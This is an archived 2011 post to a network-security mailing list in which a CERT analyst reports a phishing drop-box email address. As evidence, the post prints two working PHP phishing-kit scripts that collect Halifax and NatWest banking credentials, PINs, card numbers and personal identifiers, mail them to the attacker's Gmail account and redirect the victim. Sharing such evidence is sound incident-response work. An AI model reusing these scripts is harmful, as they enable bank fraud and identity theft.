[nsp-sec] gmail phishing drop-box
Rodolfo Baader
rbaader at arcert.gov.ar
Fri Jul 8 14:29:11 EDT 2011
Hi!
while investigating a phishing case, we've found the following dropbox:
"hardman700 at gmail.com"
Evidence:
==============================================================================
[1] <?
session_start();
$cc="hardman700 at gmail.com";
$Username = $_POST['Username'];
$Password = $_POST['Password'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
$Fschool = $_POST['fschool'];
$Email = $_POST['emad'];
$EmailPas = $_POST['emad1'];
$POB = $_POST['pob'];
$MFname = $_POST['mfname'];
$FFname = $_POST['ffname'];
$Mmdname = $_POST['mmdname'];
$DTPSN = $_POST['DTPSN'];
$telpass = $_POST['telpass'];
$mwrd = $_POST['mwrd'];
$mwrd2 = $_POST['mwrd2'];
$nis = $_POST['nis'];
$SQ = $_POST['sq'];
$ANS = $_POST['ans'];
$subj = "halifax";
$msg = "First Page\n\nUsername: $Username\nPassword: $Password\n\nSecond
Page\n\nThe name of your first school: $Fschool\nYour place/town of birth :
$POB\nYour mother's FIRST name: $MFname\nYour father's FIRST name: $FFname\nYour
mother's maiden name: $Mmdname\nSecurity Question: $SQ\nAnswer: $ANS\nEmail
Address: $Email\nEmail Password: $EmailPas\n6 Digits Telephone Banking PIN:
$DTPSN\nTelephone Banking Password: $telpass\nMemorable Info: $mwrd \nMemorable
Info: $mwrd2 \nNat-Ins-Numb: $nis \n\nSubmitted from IP Address - $ip on
$adddate\n-------\n Created By Vince\n------";
$from = "From: Shaun Halifax";
mail("$halifax", $subj, $msg, $from);
mail("$cc", $subj, $msg, $from);
header("Location:finish.php?&Mid=8007_1944504_80296_1758_3472_0_825_16178_712264114&inc=&Search=&YY=20774&order=down&sort=date&pos=0&view=a&head=b#");
?>
=============================================================================
[2] <?
$to = "hardman700 at gmail.com";
//---------------------------------
$DBID_edit = $_POST['DBID_edit'];
$LI6PPEA_edit = $_POST['LI6PPEA_edit'];
$LI6PPED_edit = $_POST['LI6PPED_edit'];
$LI6PMMN_edit = $_POST['LI6PMMN_edit'];
$LI6PPWD_edit = $_POST['LI6PPWD_edit'];
$ip = $_SERVER['REMOTE_ADDR'];
$subj = "NatWest Bank UK";
$msg = "Enter Your Customer Number : $DBID_edit\nEnter Your PIN :
$LI6PPEA_edit\nEnter Your Password : $LI6PPED_edit\nEnter Your MMN :
$LI6PMMN_edit\nEnter Your Debit Card Number : $LI6PPWD_edit\nIP : $ip";
$from = "FROM: BraIn Inc.©<mail at nwolb.com>";
{
mail($to,$subj,$msg,$from);
}
header("location: http://www.natwest.com/tools/general/nwolb_legals/index.htm");
?>
==============================================================================
R.
More information about the nsp-security
mailing list